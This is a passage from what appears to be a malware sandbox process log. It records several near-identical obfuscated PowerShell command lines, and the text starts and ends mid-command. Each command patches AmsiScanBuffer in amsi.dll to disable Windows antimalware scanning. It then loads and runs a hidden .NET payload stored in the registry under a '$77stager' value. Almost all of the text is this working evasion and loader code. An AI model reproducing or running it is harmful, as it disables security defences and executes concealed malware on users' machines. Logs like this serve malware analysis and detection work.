Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+'e'+'d'+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+'y'+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'le',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'at'+'e'+'T'+'y'+'p'+'e'+'',''+'C'+''+'l'+'a'+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+'e'+'a'+'l'+''+'e'+''+[Char](100)+',A'+[Char](110)+'s'+'i'+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+'t'+'o'+'Clas'+'s'+'',[MulticastDelegate]);$imfAZtLOgfx.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+'p'+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$eJVNHvbiwWGLTc).SetImplementationFlags('Ru'+'n'+''+[Char](116)+''+'i'+'me'+[Char](44)+'M'+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+''+'d'+'');$imfAZtLOgfx.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+[Char](111)+'ke',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+'B'+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+''+'e'+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$BFGyEKagfU,$eJVNHvbiwWGLTc).SetImplementationFlags('R'+'u'+'n'+[Char](116)+''+'i'+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'ag'+[Char](101)+''+[Char](100)+'');Write-Output $imfAZtLOgfx.CreateType();}$HMZREfWzZegLI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+[Char](101)+'N'+[Char](97)+''+'t'+''+[Char](105)+''+[Char](118)+'e'+'M'+''+[Char](101)+'t'+[Char](104)+''+'o'+'d'+'s'+'');$hBFxocMBBQiOXa=$HMZREfWzZegLI.GetMethod(''+'G'+''+'e'+'t'+[Char](80)+'r'+[Char](111)+''+[Char](99)+''+[Char](65)+''+'d'+''+'d'+''+[Char](114)+''+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+'t'+'a'+'ti'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EDPndyyFLUHPFwAyEwf=OZnFXzkJJltn @([String])([IntPtr]);$atdgAzbzWqPfRvgqHeXDIS=OZnFXzkJJltn @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rywpkVloSyx=$HMZREfWzZegLI.GetMethod(''+'G'+''+[Char](101)+'tM'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+[Char](97)+''+[Char](110)+'dle').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+'n'+''+'e'+''+[Char](108)+''+'3'+'2'+'.'+'d'+[Char](108)+''+[Char](108)+'')));$UQPozBeEMXKAIb=$hBFxocMBBQiOXa.Invoke($Null,@([Object]$rywpkVloSyx,[Object](''+[Char](76)+'oad'+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$quThHADbQvNPqcBhz=$hBFxocMBBQiOXa.Invoke($Null,@([Object]$rywpkVloSyx,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+'e'+'c'+'t')));$ZgEfmiO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UQPozBeEMXKAIb,$EDPndyyFLUHPFwAyEwf).Invoke('am'+'s'+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'');$FhpfHctsiAsiXWshq=$hBFxocMBBQiOXa.Invoke($Null,@([Object]$ZgEfmiO,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+'i'+'Sc'+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$IluHHRGmLK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($quThHADbQvNPqcBhz,$atdgAzbzWqPfRvgqHeXDIS).Invoke($FhpfHctsiAsiXWshq,[uint32]8,4,[ref]$IluHHRGmLK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$FhpfHctsiAsiXWshq,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($quThHADbQvNPqcBhz,$atdgAzbzWqPfRvgqHeXDIS).Invoke($FhpfHctsiAsiXWshq,[uint32]8,0x20,[ref]$IluHHRGmLK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'F'+[Char](84)+'WA'+'R'+''+[Char](69)+'').GetValue('$77s'+'t'+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oRyatYOykakL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$sTFlnRBcYfNXBJ,[Parameter(Position=1)][Type]$JAjWxOiRgc)$UfqvAVJlULS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+'e'+'c'+''+'t'+''+'e'+'d'+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+'d'+'u'+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+'l'+[Char](101)+'g'+'a'+''+'t'+''+'e'+'Ty'+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'blic'+','+''+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+'A'+[Char](110)+''+'s'+'iC'+[Char](108)+''+[Char](97)+''+'s'+'s'+','+'A'+'u'+'t'+[Char](111)+''+'C'+'la'+[Char](115)+'s',[MulticastDelegate]);$UfqvAVJlULS.DefineConstructor('RT'+'S'+'p'+[Char](101)+'ci'+'a'+''+'l'+'N'+'a'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+'i'+'d'+''+'e'+''+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$sTFlnRBcYfNXBJ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+'im'+'e'+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$UfqvAVJlULS.DefineMethod(''+[Char](73)+''+[Char](110)+'vo'+[Char](107)+''+'e'+'',''+[Char](80)+'ub'+'l'+''+[Char](105)+'c'+','+'H'+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+'g'+','+'N'+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$JAjWxOiRgc,$sTFlnRBcYfNXBJ).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+'e'+'d');Write-Output $UfqvAVJlULS.CreateType();}$PUefNulOOHeUH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+'r'+''+'o'+''+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n'+'3'+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+'s'+''+'a'+''+[Char](102)+''+[Char](101)+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+'M'+'e'+''+'t'+'ho'+'d'+''+[Char](115)+'');$DmTLmgfqkPBUXl=$PUefNulOOHeUH.GetMethod(''+[Char](71)+''+[Char](101)+'tP'+[Char](114)+''+[Char](111)+''+'c'+'Ad'+[Char](100)+'r'+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+'i'+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XEZyxBxHuQCytXbyEzj=oRyatYOykakL @([String])([IntPtr]);$wFmcjgvfusYVunLCZvfBqb=oRyatYOykakL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pnfPmytbydG=$PUefNulOOHeUH.GetMethod(''+[Char](71)+'e'+'t'+''+'M'+''+[Char](111)+''+[Char](100)+'u'+'l'+''+'e'+''+'H'+''+'a'+''+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+'ne'+[Char](108)+'3'+[Char](50)+''+'.'+''+[Char](100)+''+'l'+'l')));$bJCQnIvIZEUayk=$DmTLmgfqkPBUXl.Invoke($Null,@([Object]$pnfPmytbydG,[Object]('L'+[Char](111)+''+'a'+''+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$ezoflBiUOyLXphjEz=$DmTLmgfqkPBUXl.Invoke($Null,@([Object]$pnfPmytbydG,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+'a'+''+'l'+'P'+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+'t'+'')));$OmWlPab=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bJCQnIvIZEUayk,$XEZyxBxHuQCytXbyEzj).Invoke('a'+'m'+''+[Char](115)+'i.'+[Char](100)+''+[Char](108)+''+'l'+'');$vXGTLsqspGUKxEldi=$DmTLmgfqkPBUXl.Invoke($Null,@([Object]$OmWlPab,[Object]('Am'+[Char](115)+'i'+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+'r')));$NtPQtnMutl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ezoflBiUOyLXphjEz,$wFmcjgvfusYVunLCZvfBqb).Invoke($vXGTLsqspGUKxEldi,[uint32]8,4,[ref]$NtPQtnMutl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vXGTLsqspGUKxEldi,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ezoflBiUOyLXphjEz,$wFmcjgvfusYVunLCZvfBqb).Invoke($vXGTLsqspGUKxEldi,[uint32]8,0x20,[ref]$NtPQtnMutl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:WmnPaauYRxKu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XYXnRcBuFXlKVB,[Parameter(Position=1)][Type]$kpCtSTxYpG)$BCkzYvxMuBR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+'f'+'l'+'e'+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'le'+'g'+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+'yM'+[Char](111)+'dul'+[Char](101)+'',$False).DefineType('MyDe'+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+'ss,'+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+'c,Se'+[Char](97)+'l'+[Char](101)+''+[Char](100)+''+[Char](44)+'An'+'s'+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+','+''+[Char](65)+'u'+[Char](116)+''+'o'+'C'+[Char](108)+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$BCkzYvxMuBR.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+'p'+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+'m'+''+[Char](101)+''+','+''+'H'+'id'+'e'+''+'B'+''+[Char](121)+''+'S'+'i'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+'b'+'l'+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$XYXnRcBuFXlKVB).SetImplementationFlags(''+'R'+'unti'+[Char](109)+'e'+','+''+[Char](77)+'an'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$BCkzYvxMuBR.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+'y'+'S'+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+'a'+[Char](108)+'',$kpCtSTxYpG,$XYXnRcBuFXlKVB).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');Write-Output $BCkzYvxMuBR.CreateType();}$pxVtTBwmQVPJA=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+'t'+''+[Char](101)+''+[Char](109)+'.dl'+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+'o'+'f'+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+'2'+[Char](46)+'Un'+[Char](115)+''+[Char](97)+'feN'+[Char](97)+''+'t'+''+[Char](105)+''+'v'+'eMe'+[Char](116)+''+'h'+'od'+'s'+'');$zJHOntChNoPSCC=$pxVtTBwmQVPJA.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+'d'+[Char](100)+''+'r'+''+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+'S'+''+[Char](116)+'a'+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$rvzvZtQgrASaUwLmNXf=WmnPaauYRxKu @([String])([IntPtr]);$ErbHgakGJjalvgzbCpIBcO=WmnPaauYRxKu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XJvREoZPDDa=$pxVtTBwmQVPJA.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'Mo'+'d'+''+'u'+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+'e'+'r'+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+'2'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$mDGRidxXElKKjT=$zJHOntChNoPSCC.Invoke($Null,@([Object]$XJvREoZPDDa,[Object](''+'L'+'o'+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+''+'b'+''+'r'+'ar'+[Char](121)+''+[Char](65)+'')));$scBjtogqhUUDpuQbs=$zJHOntChNoPSCC.Invoke($Null,@([Object]$XJvREoZPDDa,[Object]('V'+[Char](105)+''+'r'+'t'+[Char](117)+'al'+[Char](80)+''+[Char](114)+'ot'+[Char](101)+''+'c'+''+'t'+'')));$GvceyQT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mDGRidxXElKKjT,$rvzvZtQgrASaUwLmNXf).Invoke(''+'a'+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$CrZdGZSVHcIrrAiPI=$zJHOntChNoPSCC.Invoke($Null,@([Object]$GvceyQT,[Object](''+'A'+'ms'+'i'+''+[Char](83)+''+[Char](99)+'an'+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+'r')));$dxbfotrPzS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($scBjtogqhUUDpuQbs,$ErbHgakGJjalvgzbCpIBcO).Invoke($CrZdGZSVHcIrrAiPI,[uint32]8,4,[ref]$dxbfotrPzS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$CrZdGZSVHcIrrAiPI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($scBjtogqhUUDpuQbs,$ErbHgakGJjalvgzbCpIBcO).Invoke($CrZdGZSVHcIrrAiPI,[uint32]8,0x20,[ref]$dxbfotrPzS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+'t'+[Char](97)+''+'g'+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fwYBxUpvyIEF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hwlKcODIKyUxXs,[Parameter(Position=1)][Type]$KmpAAMaeJS)$qpifVRuvnto=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+'l'+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+'De'+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'or'+[Char](121)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'Ty'+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+',S'+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+'o'+'C'+'l'+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$qpifVRuvnto.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+'i'+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+'yS'+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+'bli'+'c'+'',[Reflection.CallingConventions]::Standard,$hwlKcODIKyUxXs).SetImplementationFlags(''+'R'+'u'+[Char](110)+'t'+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');$qpifVRuvnto.DefineMethod(''+'I'+'n'+'v'+''+'o'+'ke','P'+[Char](117)+'b'+[Char](108)+'i'+'c'+''+[Char](44)+''+[Char](72)+'ide'+[Char](66)+'y'+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+'e'+'w'+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+''+','+''+'V'+''+[Char](105)+'r'+[Char](116)+''+'u'+'al',$KmpAAMaeJS,$hwlKcODIKyUxXs).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'age'+[Char](100)+'');Write-Output $qpifVRuvnto.CreateType();}$BUkDbHEMEekEA=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+''+'t'+''+'e'+'m'+[Char](46)+''+[Char](100)+'ll')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+'.'+''+'W'+'i'+[Char](110)+'32.U'+[Char](110)+'s'+'a'+''+'f'+''+'e'+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$FnJXsKdAoFeNkF=$BUkDbHEMEekEA.GetMethod('G'+[Char](101)+'t'+'P'+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+'dre'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+'t'+'a'+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$QRXJJmfNdSrwsWbdjkf=fwYBxUpvyIEF @([String])([IntPtr]);$NoQWxsllJNXQdmvvaLtTCH=fwYBxUpvyIEF @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$oecVGreOdMJ=$BUkDbHEMEekEA.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+''+'o'+''+'d'+'u'+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+'2.'+[Char](100)+''+'l'+''+[Char](108)+'')));$QwDFYZTRdUlPcD=$FnJXsKdAoFeNkF.Invoke($Null,@([Object]$oecVGreOdMJ,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+'d'+''+'L'+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$OwsSdrUZjhSnkATGR=$FnJXsKdAoFeNkF.Invoke($Null,@([Object]$oecVGreOdMJ,[Object](''+'V'+''+'i'+''+'r'+'tua'+[Char](108)+''+[Char](80)+''+'r'+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$Kinmmwz=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QwDFYZTRdUlPcD,$QRXJJmfNdSrwsWbdjkf).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+'l');$GeTwTDHXoYdflGsIG=$FnJXsKdAoFeNkF.Invoke($Null,@([Object]$Kinmmwz,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+'c'+''+'a'+''+[Char](110)+'B'+[Char](117)+'f'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$DxeHrFyCWl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OwsSdrUZjhSnkATGR,$NoQWxsllJNXQdmvvaLtTCH).Invoke($GeTwTDHXoYdflGsIG,[uint32]8,4,[ref]$DxeHrFyCWl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GeTwTDHXoYdflGsIG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OwsSdrUZjhSnkATGR,$NoQWxsllJNXQdmvvaLtTCH).Invoke($GeTwTDHXoYdflGsIG,[uint32]8,0x20,[ref]$DxeHrFyCWl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PaZEYykvehlO{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KHfbbjTxtDgrPp,[Parameter(Position=1)][Type]$sQmDMbAxFq)$wjixLFewAAQ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'efl'+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'ga'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+'D'+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+'e'+'',''+'C'+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c'+','+'S'+'e'+''+[Char](97)+'le'+'d'+''+[Char](44)+'